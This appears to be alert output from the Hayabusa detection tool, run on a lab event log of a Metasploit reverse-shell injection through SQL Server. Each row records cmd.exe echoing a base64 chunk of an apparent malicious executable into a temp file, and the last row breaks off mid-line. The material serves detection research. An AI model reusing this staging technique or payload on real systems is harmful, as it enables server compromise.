+2020-08-02 07:58:21.224 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAA9gAAeAAAAAAAAAAAAAAAAAAAAAC87QAAAAAA7wAAAAAAAAAAAAAAAAAAAAAAAAAAAI8AAAAAAAAAAAAAAAAAAL4AAAAhAAAAAAC7ADAAAAAANAAAAAAAqAAAAAAA+wAAACMAAAA9AAAAAAB3AAAAAAAAAAAAACwAAADRB6EAAAAAAAAAqwAA7OGiAAAAAAAAAAAAAAAAAOMAAAAAAAAAAAAAAAAAAAAAAFEAAABqAAAAfwC7AAAAAAAAAAAAAAAAAAAAM2cAAOkAAAAAXQAAAADvAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAALQAAAAAAAAAAAADNAAAAAAAAAAAAAAAAAAAhAAAAAG9eAAAAGQAAAAAAAAAgACsAAAAAARoAAAAAfAAAAEo6AAAAAEW+AH8AAAAAAADcAACFAAAAAAAAAAAAAADsAAAAdwAAAAAAAADuNgAAqgAAAAAAAAAAAHAAAMOHVWQAZmEAAAAAAAApALAAAD/8AAAAAADaAAAAAIQAAAAAaAAAAAAAAAAAAAAATQAAAAAAANdHAAAAiQDCAAAAAAAAAAAAAAAAAOkqAACBAAAAAMEAAAAAAAAAAAAAAAAAAAAAoAAAAABEAAAAAACAYTAAAAAAAAAAAAAA8ADDqtUAAAAAAAAATQAAAD8AAAAAAAAAAADUAAAAAAAAAPIAAAAAAADo4wAAAKQAAAAAAAAAACiYAAAA9osALQAAAAAAALYAAAAAAOEAAADjLwAaAAAAAAAAAI0AAAANAP4AAAAAAPthAAAAswBjAAAAVwAAAAAAAAAAAAAAAAAAAAAAALoAAAD5AABKAAAAAABsAAAAAAAAAAAAAAAAAADyAAAAAAAAAAAAvQAAAAAAAF4AAAAAAAAAAAAAzQAAAAAqAAAAXAB2owAAAAAAAABHugDXAAAAAAAXAAAATAAJKwAAAABuAPAAhgAAAACpvQAAAPiAAAAAAAAArgAAAAAAAADbAAAAALsAAOUAAAAAAHIAAAAAAJIAAAAAAt4AoQDuAFUAAAAAAAAA+QDoAAAAAAAAiQBLAAAAIwAAMAAAAAAAAEAVAOwAAADpAAAADCsAAOkAAAAAAAAAAAAAAADGAAAAAAAAaAAAAAAAAFkAAAAAAADsAAAAExIAAAAAAK0AAAAAAAAAAAAoAAAAcTkAAACyAABgAMIAADcAAAB3AAAAAAAAADYAAAAAAAAAAAAAAIxUYVgAAAAAAAAAAAAAAACtAAAAAAAAAADNAGoAAAAAAAAAAAAAAABtAFgAAAAAAAAAAAAAAAAAAAAPAG0AAABUAAAAAAAAAAAAAAAAAAAAQwAAAAAAAAAAAAAAAAAPAAAA4QCfAAAAAAAAAACBAAAAUAAAAAAAAAAAAAAAAAAAAPMA/gCRAAAAAgAAALaYNwCQAAAAGgAAW6QAPF0AAAAAAAAAAAAAAAAAAMEAWJIAABwAAABs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x824 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:21.498 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AADBAAAAAAAAAAAAAAAAAAAA2pcWAFUAAAAAAAAWAAAAAACGAABWAAASAABIAAAEAAAAAAAAAAAAAAAAANQAAADkAAAAALgAuiMAAAAAAOQAAACYAO8AAAAAAAAAAAAAAAAAAAAAAAAAAACKAAAAAAAAAAAgLQAAdwAAAAAAAAAAAAAAAGsAAAAAAI0AAAAAAGsAAADgAAAAAAAAAABYAAAAAO2gAAAA3gAAAAAAVSIAAABPAAAAXgAAAAAAAAAAAAAAAAAAAAAAAAB/1wCEADwAAAAAAJ0AAAAAALkAAAA+rjcAAAAAAAC0bwAAAACLAAAAAAAAAAAAAAAAAAB8AJ8AAAAjBQAAUAAAAAAAoAAAAAAAAAAAAAAAAAAAAGD0AAAAAADgAAAAAAAAAAAAAAB/AAAAAAAAAAAAAAAAAAAAAAAA8wAAAAAAAAAATgAAAAAAxmsAAAAAPwAAAAAAAAAAAFQAAABSDAAAp1oAAAAAAAAAKwAAAJMAnQDkAADRAAAhAAARAAAAAAAAAFwAXQCjpAAAAAAAAOsAAAAAAAAAAABLAAAAAAAAAAAAAAAAAAAOAAAhGhZPAAAAjM8AAHDPAAAAAAAAUs8AAEbPAAA6zwAAKs8AABjPAAAIzwAA8s4AAN7OAADGzgAAus4AAKrOAACSzgAAes4AAF7OAABOzgAAQM4AAPrLAAAKzAAAJMwAAD7MAABMzAAAXswAAGrMAAB0zAAAhswAAJrMAACyzAAAwMwAANrMAADyzAAADM0AACbNAAA+zQAAYM0AAGjNAAB6zQAAis0AAKDNAACwzQAAwM0AANLNAADgzQAA7s0AAATOAAAWzgAANM4AAAAAAADEyQAA2MsAAMbLAAC4ywAAqMsAAJjLAACEywAAeMsAAGjLAABYywAASssAAELLAAA4ywAAKssAABTLAAAKywAAAMsAAPbKAADsygAA4MoAANjKAADOygAAxMoAALTKAACkygAAmsoAAJLKAACIygAAfsoAAHTKAABsygAAZMoAAFzKAABSygAASMoAAD7KAAA0ygAAKsoAACDKAAAWygAACsoAAALKAAD6yQAA6skAAODJAADWyQAAzMkAAOzLAADczwAA0M8AAAAAAAC6zwAAsM8AAAAAAAAHAACABAAAgAkAAIA0AACADgAAgAwAAIAVAACAFwAAgAMAAIASAACACgAAgJcAAIBzAACAdAAAgG8AAIAAAAAAAAAAADaAwUoAAAAAAgAAAEoAAAAAAAAAACABAAAAAAAAAAAAAADgP3sUrkfheoQ//Knx0k1iUD8AAAAAAABQPwAAAAAAQI9AAAAAAAAA8D8AAAAAAAAAAI3ttaD3xrA+AAAAAB8AAAA7AAAAWgAAAHgAAACXAAAAtQAAANQAAADzAAAAEQEAADABAABOAQAAMgEAAFEBAAAAAAAAHwAAAD0AAABcAAAAegAAAJkAAAC4AAAA1gAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xea0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:21.772 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo APUAAAATAQAAKG51bGwpAAAwMTIzNDU2Nzg5YWJjZGVmAAAAADAxMjM0NTY3ODlBQkNERUYAAAAAMDEyMzQ1Njc4OWFiY2RlZgAAAAAwMTIzNDU2Nzg5QUJDREVGAAAAAAAAAAAAACRAAAAAAAAAJMC4HoXrUbieP5qZmZmZmbk/FCcAADz5QAAZJwAALPlAAB0nAAAY+UAAHicAAAz5QAAmJwAA+PhAACgnAADg+EAAMycAAMj4QAA0JwAArPhAADUnAACM+EAANicAAGz4QAA3JwAATPhAADgnAAA4+EAAOScAABj4QAA6JwAABPhAADsnAADs90AAPCcAAND3QAA9JwAArPdAAD4nAACM90AAPycAAGz3QABAJwAAVPdAAEEnAAA090AAQicAACT3QABDJwAADPdAAEQnAAD09kAARScAAND2QABGJwAAtPZAAEcnAACY9kAASCcAAHz2QABJJwAAZPZAAEonAABA9kAASycAABz2QABMJwAABPZAAE0nAADw9UAATicAAMz1QABPJwAAuPVAAFAnAACo9UAAUScAAJT1QABSJwAAgPVAAFMnAABs9UAAVCcAAFz1QABVJwAASPVAAFYnAAAw9UAAVycAAAz1QABrJwAA7PRAAGwnAADM9EAAbScAALD0QAB1JwAAkPRAAPkqAACA9EAA/CoAAFz0QAAAAAAAAAAAAEphbgBGZWIATWFyAEFwcgBNYXkASnVuAEp1bABBdWcAU2VwAE9jdABOb3YARGVjAFN1bgBNb24AVHVlAFdlZABUaHUARnJpAFNhdAA8AkEAMAJBACgCQQAgAkEAGAJBAAwCQQAwMTIzNDU2Nzg5AAAAAAAAAAAAAAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAEBAgEDAwMDAwMCAQEBAQABAQEBAQEBAQEBAAMCAQICAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAwIDAwEDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEDAgMDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQD5AQEA/NDU2Nzg5Ojs8PUBAQEBAQEAAAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGUBAQEBAQBobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:22.047 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8AAAAAAAAAAP////8qt0AAPrdAAKzIAAAAAAAAAAAAAB7LAADIwAAA8McAAAAAAAAAAAAAYs8AAAzAAADkxwAAAAAAAAAAAACWzwAAAMAAAITJAAAAAAAAAAAAAKTPAACgwQAAeMkAAAAAAAAAAAAAxM8AAJTBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIzPAABwzwAAAAAAAFLPAABGzwAAOs8AACrPAAAYzwAACM8AAPLOAADezgAAxs4AALrOAACqzgAAks4AAHrOAABezgAATs4AAEDOAAD6ywAACswAACTMAAA+zAAATMwAAF7MAABqzAAAdMwAAIbMAACazAAAsswAAMDMAADazAAA8swAAAzNAAAmzQAAPs0AAGDNAABozQAAes0AAIrNAACgzQAAsM0AAMDNAADSzQAA4M0AAO7NAAAEzgAAFs4AADTOAAAAAAAAxMkAANjLAADGywAAuMsAAKjLAACYywAAhMsAAHjLAABoywAAWMsAAErLAABCywAAOMsAACrLAAAUywAACssAAADLAAD2ygAA7MoAAODKAADYygAAzsoAAMTKAAC0ygAApMoAAJrKAACSygAAiMoAAH7KAAB0ygAAbMoAAGTKAABcygAAUsoAAEjKAAA+ygAANMoAACrKAAAgygAAFsoAAArKAAACygAA+skAAOrJAADgyQAA1skAAMzJAADsywAA3M8AANDPAAAAAAAAus8AALDPAAAAAAAABwAAgAQAAIAJAACANAAAgA4AAIAMAACAFQAAgBcAAIADAACAEgAAgAoAAICXAACAcwAAgHQAAIBvAACAAAAAABMBX2lvYgAAWAJmcHJpbnRmALcCc3RyY2hyAACOAV9wY3R5cGUAYQBfX21iX2N1cl9tYXgAAEkCZXhpdAAAPQJhdG9pAAAVAV9pc2N0eXBlAACeAnByaW50ZgAArwJzaWduYWwAAJECbWFsbG9jAABAAmNhbGxvYwAATwJmZmx1c2gAAEwCZmNsb3NlAACcAnBlcnJvcgAAVwJmb3BlbgCkAnFzb3J0APEAX2Z0b2wAwQJzdHJuY3B5AMUCc3Ryc3RyAADAAnN0cm5jbXAAXgJmcmVlAADIAF9lcnJubwAAegBfX3BfX3dlbnZpcm9uAG0AX19wX19lbnZpcm9uAACnAnJlYWxsb2MAxAJzdHJzcG4AAJsCbW9kZgAAvAJzdHJlcnJvcgAA4wJ3Y3NjcHkAAOYCd2NzbGVuAACzAF9jbG9zZQAA6AJ3Y3NuY21wAMMCc3RycmNocgBNU1ZDUlQuZGxsAABVAF9fZGxsb25leGl0AIYBX29u>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x121c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:22.320 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXhpdADTAF9leGl0AEgAX1hjcHRGaWx0ZXIAZABfX3BfX19pbml0ZW52AFgAX19nZXRtYWluYXJncwAPAV9pbml0dGVybQCDAF9fc2V0dXNlcm1hdGhlcnIAAJ0AX2FkanVzdF9mZGl2AABqAF9fcF9fY29tbW9kZQAAbwBfX3BfX2Ztb2RlAACBAF9fc2V0X2FwcF90eXBlAADKAF9leGNlcHRfaGFuZGxlcjMAALcAX2NvbnRyb2xmcAAAHQNTZXRMYXN0RXJyb3IAAO4ARnJlZUVudmlyb25tZW50U3RyaW5nc1cATwFHZXRFbnZpcm9ubWVudFN0cmluZ3NXAAD1AUdsb2JhbEZyZWUAAAkBR2V0Q29tbWFuZExpbmVXAFYDVGxzQWxsb2MAAFcDVGxzRnJlZQCMAER1cGxpY2F0ZUhhbmRsZQA6AUdldEN1cnJlbnRQcm9jZXNzABoDU2V0SGFuZGxlSW5mb3JtYXRpb24AAC4AQ2xvc2VIYW5kbGUAwAFHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQC8AEZpbGVUaW1lVG9TeXN0ZW1UaW1lAADYAUdldFRpbWVab25lSW5mb3JtYXRpb24AALsARmlsZVRpbWVUb0xvY2FsRmlsZVRpbWUATgNTeXN0ZW1UaW1lVG9GaWxlVGltZQAATwNTeXN0ZW1UaW1lVG9UelNwZWNpZmljTG9jYWxUaW1lAEkDU2xlZXAA6gBGb3JtYXRNZXNzYWdlQQAAaQFHZXRMYXN0RXJyb3IAAIUDV2FpdEZvclNpbmdsZU9iamVjdABJAENyZWF0ZUV2ZW50QQAALANTZXRTdGRIYW5kbGUAABADU2V0RmlsZVBvaW50ZXIAAE0AQ3JlYXRlRmlsZUEAUABDcmVhdGVGaWxlVwCMAUdldE92ZXJsYXBwZWRSZXN1bHQAgwBEZXZpY2VJb0NvbnRyb2wAWgFHZXRGaWxlSW5mb3JtYXRpb25CeUhhbmRsZQAAUgJMb2NhbEZyZWUAXgFHZXRGaWxlVHlwZQBaAENyZWF0ZU11dGV4QQAAGQJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uAHoARGVsZXRlQ3JpdGljYWxTZWN0aW9uAI8ARW50ZXJDcml0aWNhbFNlY3Rpb24AALgCUmVsZWFzZU11dGV4AAALA1NldEV2ZW50AABHAkxlYXZlQ3JpdGljYWxTZWN0aW9uAABRA1Rlcm1pbmF0ZVByb2Nlc3MAAFIBR2V0RXhpdENvZGVQcm9jZXNzAADfAUdldFZlcnNpb25FeEEAmAFHZXRQcm9jQWRkcmVzcwAASAJMb2FkTGlicmFyeUEAAJcDV3JpdGVGaWxlAKsCUmVhZEZpbGUAAIcCUGVla05hbWVkUGlwZQBLRVJORUwzMi5kbGwAAB0AQWxsb2NhdGVBbmRJbml0aWFsaXplU2lkAADhAEZy>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:22.593 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZWVTaWQAQURWQVBJMzIuZGxsAABXU09DSzMyLmRsbAA5AFdTQVNlbmQANABXU0FSZWN2AFdTMl8zMi5kbGwAAMUBX3N0cm5pY21wAL8BX3N0cmR1cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAZAAAAAEAAAABAAAAAQAAAAAAAACAw8kBAAAAAOALQQAyAAAAQgAAAEsAAABQAAAAWgAAAF8AAABiAAAAYwAAAGQAAAAlczogQ2Fubm90IHVzZSBjb25jdXJyZW5jeSBsZXZlbCBncmVhdGVyIHRoYW4gdG90YWwgbnVtYmVyIG9mIHJlcXVlc3RzCgAlczogSW52YWxpZCBDb25jdXJyZW5jeSBbUmFuZ2UgMC4uJWRdCgAAJXM6IGludmFsaWQgVVJMCgAAAAAlczogd3JvbmcgbnVtYmVyIG9mIGFyZ3VtZW50cwoAAFVzZXItQWdlbnQ6AEFjY2VwdDoASG9zdDoAAABQcm94eS1BdXRob3JpemF0aW9uOiBCYXNpYyAAUHJveHkgY3JlZGVudGlhbHMgdG9vIGxvbmcKAEF1dGhvcml6YXRpb246IEJhc2ljIAAAAEF1dGhlbnRpY2F0aW9uIGNyZWRlbnRpYWxzIHRvbyBsb25nCgAAAABDb29raWU6IAAAAAANCgAAQ2Fubm90IG1peCBQVVQgYW5kIEhFQUQKAAAAAENhbm5vdCBtaXggUE9TVCBhbmQgSEVBRAoAAABDYW5ub3QgbWl4IFBPU1QvUFVUIGFuZCBIRUFECgAAAEludmFsaWQgbnVtYmVyIG9mIHJlcXVlc3RzCgBuOmM6dDpiOlQ6cDp1OnY6cmtWaHdpeDp5Ono6QzpIOlA6QTpnOlg6ZGU6U3EAAABiZ2NvbG9yPXdoaXRlAAAAVG90YWwgb2YgJWQgcmVxdWVzdHMgY29tcGxldGVkCgAlcwoALi5kb25lCgBGaW5pc2hlZCAlZCByZXF1ZXN0cwoAAABhcHJfc29ja2V0X2Nvbm5lY3QoKQAAAAAKVGVzdCBhYm9ydGVkIGFmdGVyIDEwIGZhaWx1cmVzCgoAAAAKU2VydmVyIHRpbWVkIG91dAoKAGFwcl9wb2xsAAAAAGFwcl9zb2NrYWRkcl9pbmZvX2dldCgpIGZvciAlcwAAZXJyb3IgY3JlYXRpbmcgcmVxdWVzdCBidWZmZXI6IG91dCBvZiBtZW1vcnkKAAAASU5GTzogJXMgaGVhZGVyID09IAotLS0KJXMKLS0tCgBSZXF1ZXN0IHRvbyBsb25nCgAAACVzICVzIEhUVFAvMS4wDQolcyVzJXNDb250ZW50LWxlbmd0aDogJXUNCkNvbnRlbnQtdHlwZTogJXMNCiVzDQoAAAAAUFVUAFBPU1QAAAAAdGV4dC9wbGFpbgAAJXMgJXMgSFRUUC8xLjAN>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x20 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:22.867 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo CiVzJXMlcyVzDQoAAEhFQUQAAAAAR0VUAENvbm5lY3Rpb246IEtlZXAtQWxpdmUNCgAAAABBY2NlcHQ6ICovKg0KAAAAVXNlci1BZ2VudDogQXBhY2hlQmVuY2gvAAAAADIuMwBIb3N0OiAAAGFwcl9wb2xsc2V0X2NyZWF0ZSBmYWlsZWQAAAAoYmUgcGF0aWVudCklcwAALi4uAAoAAABbdGhyb3VnaCAlczolZF0gAAAAAEJlbmNobWFya2luZyAlcyAAAAAAJXM6ICVzICglZCkKAAAAAFNlbmQgcmVxdWVzdCBmYWlsZWQhCgAAAFNlbmQgcmVxdWVzdCB0aW1lZCBvdXQhCgAAAAAlcwklSTY0ZAklSTY0ZAklSTY0ZAklSTY0ZAklSTY0ZAoAAABzdGFydHRpbWUJc2Vjb25kcwljdGltZQlkdGltZQl0dGltZQl3YWl0CgAAAENhbm5vdCBvcGVuIGdudXBsb3Qgb3V0cHV0IGZpbGUAJWQsJS4zZgoAAAAAUGVyY2VudGFnZSBzZXJ2ZWQsVGltZSBpbiBtcwoAAABDYW5ub3Qgb3BlbiBDU1Ygb3V0cHV0IGZpbGUAdwAAACAgJWQlJSAgJTVJNjRkCgAgMTAwJSUgICU1STY0ZCAobG9uZ2VzdCByZXF1ZXN0KQoAAAAgMCUlICA8MD4gKG5ldmVyKQoAAApQZXJjZW50YWdlIG9mIHRoZSByZXF1ZXN0cyBzZXJ2ZWQgd2l0aGluIGEgY2VydGFpbiB0aW1lIChtcykKAABUb3RhbDogICAgICAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAABQcm9jZXNzaW5nOiAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAABDb25uZWN0OiAgICAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAAAgICAgICAgICAgICAgIG1pbiAgIGF2ZyAgIG1heAoAAFdBUk5JTkc6IFRoZSBtZWRpYW4gYW5kIG1lYW4gZm9yIHRoZSB0b3RhbCB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAAAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgdG90YWwgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgBXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgd2FpdGluZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRo>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:23.140 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHdhaXRpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAAAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgcHJvY2Vzc2luZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHByb2Nlc3NpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG5vdCB3aXRoaW4gYSBub3JtYWwgZGV2aWF0aW9uCiAgICAgICAgVGhlc2UgcmVzdWx0cyBhcmUgcHJvYmFibHkgbm90IHRoYXQgcmVsaWFibGUuCgAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG1vcmUgdGhhbiB0d2ljZSB0aGUgc3RhbmRhcmQKICAgICAgIGRldmlhdGlvbiBhcGFydC4gVGhlc2UgcmVzdWx0cyBhcmUgTk9UIHJlbGlhYmxlLgoAAAAAVG90YWw6ICAgICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAV2FpdGluZzogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAUHJvY2Vzc2luZzogJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAQ29ubmVjdDogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAICAgICAgICAgICAgICBtaW4gIG1lYW5bKy8tc2RdIG1lZGlhbiAgIG1heAoAAAAACkNvbm5lY3Rpb24gVGltZXMgKG1zKQoAICAgICAgICAgICAgICAgICAgICAgICAgJS4yZiBrYi9zIHRvdGFsCgAAAAAgICAgICAgICAgICAg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:23.414 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ICAgICAgICAgICAlLjJmIGtiL3Mgc2VudAoAVHJhbnNmZXIgcmF0ZTogICAgICAgICAgJS4yZiBbS2J5dGVzL3NlY10gcmVjZWl2ZWQKAFRpbWUgcGVyIHJlcXVlc3Q6ICAgICAgICUuM2YgW21zXSAobWVhbiwgYWNyb3NzIGFsbCBjb25jdXJyZW50IHJlcXVlc3RzKQoAAABUaW1lIHBlciByZXF1ZXN0OiAgICAgICAlLjNmIFttc10gKG1lYW4pCgAAAFJlcXVlc3RzIHBlciBzZWNvbmQ6ICAgICUuMmYgWyMvc2VjXSAobWVhbikKAAAAAEhUTUwgdHJhbnNmZXJyZWQ6ICAgICAgICVJNjRkIGJ5dGVzCgAAAABUb3RhbCBQVVQ6ICAgICAgICAgICAgICAlSTY0ZAoAAFRvdGFsIFBPU1RlZDogICAgICAgICAgICVJNjRkCgAAVG90YWwgdHJhbnNmZXJyZWQ6ICAgICAgJUk2NGQgYnl0ZXMKAAAAAEtlZXAtQWxpdmUgcmVxdWVzdHM6ICAgICVkCgBOb24tMnh4IHJlc3BvbnNlczogICAgICAlZAoAV3JpdGUgZXJyb3JzOiAgICAgICAgICAgJWQKACAgIChDb25uZWN0OiAlZCwgUmVjZWl2ZTogJWQsIExlbmd0aDogJWQsIEV4Y2VwdGlvbnM6ICVkKQoAAEZhaWxlZCByZXF1ZXN0czogICAgICAgICVkCgBDb21wbGV0ZSByZXF1ZXN0czogICAgICAlZAoAVGltZSB0YWtlbiBmb3IgdGVzdHM6ICAgJS4zZiBzZWNvbmRzCgAAAENvbmN1cnJlbmN5IExldmVsOiAgICAgICVkCgBEb2N1bWVudCBMZW5ndGg6ICAgICAgICAldSBieXRlcwoAAABEb2N1bWVudCBQYXRoOiAgICAgICAgICAlcwoAU2VydmVyIFBvcnQ6ICAgICAgICAgICAgJWh1CgAAAABTZXJ2ZXIgSG9zdG5hbWU6ICAgICAgICAlcwoAU2VydmVyIFNvZnR3YXJlOiAgICAgICAgJXMKAAoKAAA8L3RhYmxlPgoAAAAAAAAAPHRyICVzPjx0aCAlcz5Ub3RhbDo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggJXM+UHJvY2Vzc2luZzo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk